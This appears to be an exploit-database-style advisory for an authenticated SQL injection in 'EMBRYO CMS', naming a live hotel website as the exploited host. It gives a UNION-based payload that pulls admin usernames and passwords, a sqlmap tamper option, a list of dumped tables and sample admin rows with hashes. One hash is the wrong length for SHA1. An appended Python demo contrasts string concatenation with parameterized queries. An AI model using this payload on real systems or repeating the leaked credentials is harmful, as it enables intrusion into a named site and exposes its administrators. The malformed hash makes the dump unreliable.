# Exploit Title: EMBRYO CMS by Pyxis Studio - Authenticated SQL Injection
# Exploited Host: https://www.embryohotel.com/
# Exploit Author: 0x6ick
# Vendor Homepage: https://pyxisstudio.com/
# Software Link: N/A
# Version: unknown
# Tested On: Linux server running MySQL 5.0.12+
## Vulnerability Details:
An SQL injection vulnerability was discovered in the EMBRYO CMS by Pyxis Studio, as deployed on www.embryohotel.com. The vulnerable parameter allows an authenticated user to perform UNION-based SQL injection, leading to a full dump of the database, including administrator credentials.
## Proof of Concept:
Vulnerable Parameter:
`GET /somepage.php?id=1' UNION SELECT ...`
Payload:
`1' UNION SELECT 1,2,group_concat(username,0x3a,password),4 FROM admin--`
Tamper:
`--tamper=space2comment`
## Dumped Tables:
- admin.csv (with SHA1-hashed passwords)
- contact.csv
- room.csv, room_image.csv
- room_option.csv, room_option_reletive.csv
- slideshow.csv, slideshow_mobile.csv
- local_area.csv
Example Dump:
id,password,username,permission
1,e742c63f03ab602f2b38433ffc28b5145ba1332d,admin,1
2,89d36b5c82506f89c135b9794af7212cb5406dfcf,ARMERX,0
## Impact:
Full disclosure of administrator credentials and sensitive data.
## Recommendation:
Use parameterized (prepared) queries for all database access instead of concatenating user input directly into SQL strings. Update EMBRYO CMS with proper security filters.
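The concatenation pattern behind this bug, beside the parameterized form the recommendation calls for, as an added example that is not code from EMBRYO CMS or Pyxis Studio: Python with an in-memory SQLite database stands in for the PHP/MySQL stack, so the constructed `room` and `admin` tables, their column names, the placeholder hashes and the payload's `||` concatenation (SQLite has no `0x3a` string literal) are all assumptions.

```python
import sqlite3

# Constructed stand-in schema and rows; not the real EMBRYO CMS database.
SCHEMA = """
CREATE TABLE room (id INTEGER, name TEXT, description TEXT, price INTEGER);
CREATE TABLE admin (id INTEGER, password TEXT, username TEXT, permission INTEGER);
INSERT INTO room VALUES (1, 'Deluxe', 'Sea view', 120);
INSERT INTO admin VALUES (1, 'sha1-placeholder-1', 'admin', 1);
INSERT INTO admin VALUES (2, 'sha1-placeholder-2', 'editor', 0);
"""

# Same shape as the advisory's payload, with SQLite's || in place of MySQL's 0x3a.
PAYLOAD = "1' UNION SELECT 1,2,group_concat(username||':'||password),4 FROM admin--"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def room_lookup_vulnerable(conn, room_id):
    # The bug: the request parameter is spliced into the SQL text, so a quote
    # closes the string literal and the rest of the value is parsed as SQL.
    sql = "SELECT id, name, description, price FROM room WHERE id = '" + room_id + "'"
    return conn.execute(sql).fetchall()


def room_lookup_fixed(conn, room_id):
    # The fix: a placeholder; the driver binds the value separately, so it is
    # never parsed as SQL and the UNION text is just a non-matching id.
    sql = "SELECT id, name, description, price FROM room WHERE id = ?"
    return conn.execute(sql, (room_id,)).fetchall()


def leaked_credentials(rows):
    # Collects admin-table strings that surfaced through the room query.
    return [row[2] for row in rows if isinstance(row[2], str) and ":" in row[2]]


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", leaked_credentials(room_lookup_vulnerable(db, PAYLOAD)))
    print("fixed:     ", leaked_credentials(room_lookup_fixed(db, PAYLOAD)))
```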
# Discovered & Reported by:
0x6ick